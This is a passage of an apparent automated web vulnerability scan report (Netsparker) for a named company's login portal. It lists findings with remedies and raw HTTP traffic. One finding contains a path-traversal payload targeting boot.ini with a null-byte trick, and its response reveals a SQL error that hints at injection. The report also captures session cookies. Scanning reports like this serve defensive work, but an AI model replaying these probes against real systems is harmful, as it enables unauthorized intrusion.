var value = self.location.href.substring(self.location.href.indexOf("returnurl=")+10);
if(value.indexOf("&") > 0)
value = value.substring(0, value.indexOf("&"));

returnUrl = value;
}
document.frmLogin.returnurl.value = returnUrl;

parseCookie();
}

function parseCookie() {
if (!document.cookie || self.location.href.indexOf("newuser") > 0)
return;

var aryText = (unescape(document.cookie)).split(";");
var strEmail = "";
var strPassword = "";

for (var idx = 0; idx < aryText.length; idx++) {
var temp = aryText[idx].split("=");

if (temp[0].toLowerCase().replace(/ /g, "") == "email" && temp[1])
strEmail = temp[1];
else if (temp[0].toLowerCase().replace(/ /g, "") == "password" && temp[1])
strPassword = temp[1];

if (strEmail.length > 0 && strPassword.length > 0) {
if (strEmail == "undefined" || strPassword == "undefined")
return;
self.location = "ProcessLogin.aspx?" + (gotoParams == "" ? "" : "goto=" + gotoParams) + "&d=" + Math.random();
return;
}
}
}

function isFormValidForSubmission() {
var txtEmail = $("input[name=txtemail]").val();
if (!txtEmail){
alert("Please enter a valid e-mail address.");
return false;
}
var txtPass = $("input[name=txtpass]").val();
if (!txtPass) {
alert("Please enter a valid password.");
return false;
}

return true;
}

$(document).ready(function() {
$("#frmLogin").submit(function() { return isFormValidForSubmission(); });
});
</script>
</head>
<body id="Login_Body" onload="testCookies();">
<form action="processLogin.rails" method="post" name="frmLogin" id="frmLogin">
<input type="hidden" name="gotoparams" value=""/>
<input type="hidden" name="returnurl" value="" />
<table id="Table_Login_Masthead" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Masthead">&nbsp;</div>
</td>
</tr>
</table>
<table id="Table_Login_Logo" bgcolor="White" align="center" width="760" border="0" cellpadding="0" cellspacing="0" border="0">
<tr>
<td valign="top" align="center">
<div id="Login_Logo">&nbsp;</div>
</td>
</tr>
</table>
<table align="center" width="760" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="750" rowspan="0" align="center" valign="top" bgcolor="#FFFFFF">
<table align="center" border="0" cellpadding="0" cellspacing="3">
<tr>
<td width="79" class="standardText">Email:</td>
<td width="258"><input class="fieldText" type="text" name="txtemail" id="txtemail" size="30"></td>
</tr>
<tr>
<td width="79" class="standardText">Password:</td>
<td width="258"><input class="fieldText" type="password" name="txtpass" size="30"> <input type="image" src="images\go.gif" alt="Go" name="btnSubmit" id="btnSubmit" class="standardButton" value="Go"/></td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="center">
&nbsp;&nbsp;&nbsp;
</td>
</tr>
<tr>
<td colspan="2"><div align="center"><br>
<a href="javascript:emailPassword();">Forgot your password? Click here to have it
emailed to you.</a></div>
</td>
</tr>
</table>
<p>&nbsp;</p>
<p><br>
</p>
</td>
</tr>
<tr>
<td valign="bottom" bgcolor="#FFFFFF">&nbsp;</td>
</tr>
</table>
</form>
</body>
</html>
Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /v4_6_release/services/system_io/Portal/_processLogin.asp

/v4_6_release/services/system_io/Portal/_processLogin.asp

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/_processLogin.asp

Parameters

Parameter Type Value
btnSubmit POST Go
gotoparams POST 3
txtemail POST ../../../../../../../../../../boot.ini.asp
txtpass POST 3

Request

POST /v4_6_release/services/system_io/Portal/_processLogin.asp HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; Company=compudyne; Member=website; ASPSESSIONIDSQQSRDRC=IPEFNDEAMABKBMLGCFOGPNDC; Password=; MID=; Email=
Content-Length: 112
Accept-Encoding: gzip, deflate

btnSubmit=Go&gotoparams=3&txtemail=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500.asp&txtpass=3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 21 Apr 2011 20:20:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 379
Content-Type: text/html
Cache-control: private


<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Unclosed quotation mark after the character string '../../../../../../../../../../boot.ini'.</font><p><font face="Arial" size=2>/v4_6_release/common/asp/databasenew.asp</font><font face="Arial" size=2>, line 79</font>
ViewState is not Encrypted

ViewState is not Encrypted
1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page. 
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file. 
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>

Remedy References

- /v4_6_release/services/system_io/Portal/Header.aspx

/v4_6_release/services/system_io/Portal/Header.aspx

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Header.aspx

ViewState Version

.NET Framework 2.x

Request

GET /v4_6_release/services/system_io/Portal/Header.aspx HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Frame.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; Company=compudyne; Member=website; Password=; MID=; Email=; ASPSESSIONIDSQQSRDRC=DPEFNDEAMBPCLEJOMAOPAJHL
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1386
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 21 Apr 2011 20:19:52 GMT



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<title>Header</title>
<meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
<meta content="C#" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">
<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<LINK href="Style.css.aspx" type="text/css" rel="stylesheet">
</HEAD>
<body class="header" bgColor="#39609b">
<form name="ctl00" method="post" action="Header.aspx" id="ctl00">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkzMDk0NzE5OWRkljiudORMm9z2AjJ/4rOjHdtarwQ=" />
</div>


<table cellSpacing="0" cellPadding="0" width="100%" border="0">
<tr class="bar1" vAlign="top">
<td class="bar1" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px" cellpadding="0">
<table id="Table5" style="MARGIN: 0px; WIDTH: 100%" cellSpacing="0" cellPadding="0" width="100%" border="0">
<tr>
<td class="bar1inner" vAlign="top" bgColor="#072e67"><img id="DataBoundImageLogo_Image" src="http://magnum.compudyne.net:80/v4_6_release/common/images/custom/edge_logo_md.gif" style="border-width:0px;" />
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</HTML>
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /v4_6_release/

/v4_6_release/ CONFIRMED

http://magnum.compudyne.net/v4_6_release/

Request

GET /v4_6_release/ HTTP/1.1
Referer: http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 20:19:47 GMT


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
IIS Version Disclosure

IIS Version Disclosure
1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /robots.txt

/robots.txt

http://magnum.compudyne.net/robots.txt

Extracted Version

Microsoft-IIS/6.0

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; Company=compudyne; Member=website
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: max-age=345600
Content-Length: 63
Content-Type: text/plain
Content-Encoding:
Last-Modified: Thu, 08 Nov 2007 18:24:39 GMT
Accept-Ranges: bytes
ETag: "80d859f3422c81:2622"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 20:19:47 GMT


User-agent: *
Disallow: /
Robots.txt Identified

Robots.txt Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

- /robots.txt

/robots.txt CONFIRMED

http://magnum.compudyne.net/robots.txt

Interesting Robots.txt Entries

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=chxffhngwc30yu45jjzviwbg; sessionID=11585307-83ba-44eb-9197-5c8112b0dc31; Company=compudyne; Member=website
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: max-age=345600
Content-Length: 63
Content-Type: text/plain
Content-Encoding:
Last-Modified: Thu, 08 Nov 2007 18:24:39 GMT
Accept-Ranges: bytes
ETag: "80d859f3422c81:2622"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 20:19:47 GMT


User-agent: *
Disallow: /
ASP.NET Debugging Enabled

ASP.NET Debugging Enabled
1 TOTAL
INFORMATION
Netsparker identified that ASP.NET Debugging is enabled.

Impact

This indicates that the debugging flag was left enabled in the production system. There is no direct impact of this issue and it is presented here only for information.

Remedy

Apply the following changes on your web.config file to disable ASP.NET debugging.
<System.Web>
     < compilation debug="false" /> 
</System.Web>

External References

- /v4_6_release/services/system_io/Portal/Default.aspx

/v4_6_release/services/system_io/Portal/Default.aspx

http://magnum.compudyne.net/v4_6_release/services/system_io/Portal/Default.aspx?undefined

Request

DEBUG /v4_6_release/services/system_io/Portal/Default.aspx?undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: magnum.compudyne.net
Cookie: ASP.NET_SessionId=o1palv55p1kb0f55qmwkx2qa; sessionID=95034bbc-06da-412b-8315-f03835680139; Company=compudyne; Member=website
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 21 Apr 2011 20:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27


DEBUG request is not valid.